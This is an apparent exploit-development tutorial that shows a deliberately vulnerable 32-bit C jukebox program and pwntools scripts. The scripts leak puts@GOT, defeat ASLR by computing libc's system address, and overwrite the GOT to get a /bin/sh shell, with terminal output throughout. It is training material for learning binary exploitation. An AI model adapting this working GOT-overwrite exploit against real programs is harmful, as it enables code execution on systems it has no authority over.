9. Bypassing ASLR/NX with GOT Overwrite

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>

struct record {
    char name[24];
    char * album;
};

int main() {
    // Print Title
    puts("This is a Jukebox");

    // Create the struct record
    struct record now_playing;
    strcpy(now_playing.name, "Simple Minds");
    now_playing.album = (char *) malloc(sizeof(char) * 24);
    strcpy(now_playing.album, "Breakfast");
    printf("Now Playing: %s (%s)\n", now_playing.name, now_playing.album);

    // Read some user data
    read(0, now_playing.name, 28);
    printf("Now Playing: %s (%s)\n", now_playing.name, now_playing.album);

    // Overwrite the album
    read(0, now_playing.album, 4);
    printf("Now Playing: %s (%s)\n", now_playing.name, now_playing.album);

    // Print the name again
    puts(now_playing.name);
}

ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/build$ ./1_records
This is a Jukebox
Now Playing: Simple Minds (Breakfast)
Hello
Now Playing: Hello
 Minds (Breakfast)
Stuff
Now Playing: Hello
 Minds (Stufkfast)
Hello
 Minds

gdb-peda$ find "This is a Jukebox"
Searching for 'This is a Jukebox' in: None ranges
Found 2 results, display max 2 items:
1_records : 0x8048610 ("This is a Jukebox")
1_records : 0x8049610 ("This is a Jukebox")

#!/usr/bin/python

from pwn import *

def main():
    p = process("../build/1_records")

    # Craft first stage (arbitrary read)
    leak_address = 0x8048610    # Address of "This is a Jukebox"
    stage_1 = "A"*24 + p32(leak_address)

    # Send the first stage
    p.send(stage_1)

    p.interactive()

if __name__ == "__main__":
    main()

ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/scripts$ python 1_arbitrary_read.py
[+] Starting local process '../build/1_records': Done
This is a Jukebox
Now Playing: Simple Minds (Breakfast)
Now Playing: AAAAAAAAAAAAAAAAAAAAAAAA\x10\x86\x0�so�.�\xff (This is a Jukebox)
$

#!/usr/bin/python

from pwn import *

def main():
    p = process("../build/1_records")

    # Craft first stage (arbitrary read)
    leak_address = 0x8048610    # Address of "This is a Jukebox"
    stage_1 = "A"*24 + p32(leak_address)
    p.recvrepeat(0.2)

    # Send the first stage
    p.send(stage_1)

    # Parse the response
    data = p.recvrepeat(0.2)
    leak = data[data.find("(")+1:data.rfind(")")]
    log.info("Got leaked data: %s" % leak)

    p.interactive()

if __name__ == "__main__":
    main()

ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/scripts$ python 2_arbitrary_read_controlled.py
[+] Starting local process '../build/1_records': Done
[*] Got leaked data: This is a Jukebox
[*] Switching to interactive mode
$

    system(now_playing.name);

ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/build$ readelf -r ./1_records  | grep puts
0804a018  00000407 R_386_JUMP_SLOT   00000000   puts@GLIBC_2.0

#!/usr/bin/python

from pwn import *

def main():
    p = process("../build/1_records")

    # Craft first stage (arbitrary read)
    leak_address = 0x0804a018    # Address of puts@got
    stage_1 = "A"*24 + p32(leak_address)
    p.recvrepeat(0.2)

    # Send the first stage
    p.send(stage_1)

    # Parse the response
    data = p.recvrepeat(0.2)
    leak = data[data.find("(")+1:data.rfind(")")]
    log.info("Got leaked data: %s" % leak)
    puts_addr = u32(leak[:4])
    log.info("puts@libc: 0x%x" % puts_addr)

    p.interactive()

if __name__ == "__main__":
    main()

ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/scripts$ python 3_leak_puts_got.py
[+] Starting local process '../build/1_records': Done
[*] Got leaked data: �
                      f�@�a�
[*] puts@libc: 0xf7660ca0
[*] Switching to interactive mode
$

#!/usr/bin/python

from pwn import *

def main():
    p = process("../build/1_records")

    # Craft first stage (arbitrary read)
    leak_address = 0x0804a018    # Address of puts@got
    stage_1 = "A"*24 + p32(leak_address)
    p.recvrepeat(0.2)

    # Send the first stage
    p.send(stage_1)

    # Parse the response
    data = p.recvrepeat(0.2)
    leak = data[data.find("(")+1:data.rfind(")")]
    log.info("Got leaked data: %s" % leak)
    puts_addr = u32(leak[:4])
    log.info("puts@libc: 0x%x" % puts_addr)

    # Overwrite puts@got
    ret_address =0xdeadc0de
    p.send(p32(ret_address))

    p.interactive()

if __name__ == "__main__":
    main()

ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/scripts$ python 4_eip_control.py
[+] Starting local process '../build/1_records': Done
[*] Got leaked data: �,c�@�^�
[*] puts@libc: 0xf7632ca0
[*] Switching to interactive mode
Now Playing: AAAAAAAAAAAAAAAAAAAAAAAA\x18\xa0\x0�Sx�@Ż\xff (��\xad�@\xb5^�)
$  [*] Got EOF while reading in interactive

[*] Process '../build/1_records' stopped with exit code -11
[*] Got EOF while sending in interactive
ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/scripts$ dmesg | tail -n 1
[19310.052976] 1_records[3815]: segfault at deadc0de ip 00000000deadc0de sp 00000000ffbbc4ec error 14 in libc-2.23.so[f75d3000+1af000]

ubuntu@ubuntu-xenial:~/libc-database$ objdump -d /lib/i386-linux-gnu/libc-2.23.so | grep "<_IO_puts@@GLIBC_2.0>:"
0005fca0 <_IO_puts@@GLIBC_2.0>:
ubuntu@ubuntu-xenial:~/libc-database$ ./dump local-03ffe08ba6d5e7f5b1d647f6a14e6837938e3bed | grep system
offset_system = 0x0003ada0

#!/usr/bin/python

from pwn import *

def main():
    p = process("../build/1_records")

    # Craft first stage (arbitrary read)
    leak_address = 0x0804a018    # Address of puts@got
    command = "/bin/sh"
    stage_1 = command.ljust(24, "\x00") + p32(leak_address)
    p.recvrepeat(0.2)

    # Send the first stage
    p.send(stage_1)

    # Parse the response
    data = p.recvrepeat(0.2)
    leak = data[data.find("(")+1:data.rfind(")")]
    log.info("Got leaked data: %s" % leak)
    puts_addr = u32(leak[:4])
    log.info("puts@libc: 0x%x" % puts_addr)

    # Calculate libc base and system
    puts_offset = 0x5fca0
    libc_base = puts_addr - puts_offset
    log.info("libc base: 0x%x" % libc_base)
    system_offset = 0x0003ada0
    system_addr = libc_base + system_offset
    log.info("system@libc: 0x%x" % system_addr)

    # Overwrite puts@got
    ret_address = system_addr
    p.send(p32(ret_address))

    p.interactive()

if __name__ == "__main__":
    main()

ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/scripts$ python 5_final.py
[+] Starting local process '../build/1_records': Done
[*] Got leaked data: ��Z�@uV�
[*] puts@libc: 0xf75aeca0
[*] libc base: 0xf754f000
[*] system@libc: 0xf7589da0
[*] Switching to interactive mode
Now Playing: /bin/sh (\xa0\x9dX�@uV�)
$                                  ls -la
total 2232
drwxrwxr-x 1 ubuntu ubuntu    4096 Jan 13 18:01 .
drwxrwxr-x 1 ubuntu ubuntu    4096 Jan 13 18:02 ..
-rw-rw-r-- 1 ubuntu ubuntu     345 Jan 13 16:49 1_arbitrary_read.py
-rw-rw-r-- 1 ubuntu ubuntu     515 Jan 13 16:50 2_arbitrary_read_controlled.py
-rw-rw-r-- 1 ubuntu ubuntu     579 Jan 13 16:52 3_leak_puts_got.py
-rw-rw-r-- 1 ubuntu ubuntu     662 Jan 13 16:54 4_eip_control.py
-rw-rw-r-- 1 ubuntu ubuntu     978 Jan 13 17:00 5_final.py
$
[*] Stopped program '../build/1_records'
ubuntu@ubuntu-xenial:/vagrant/lessons/10_bypass_got/scripts$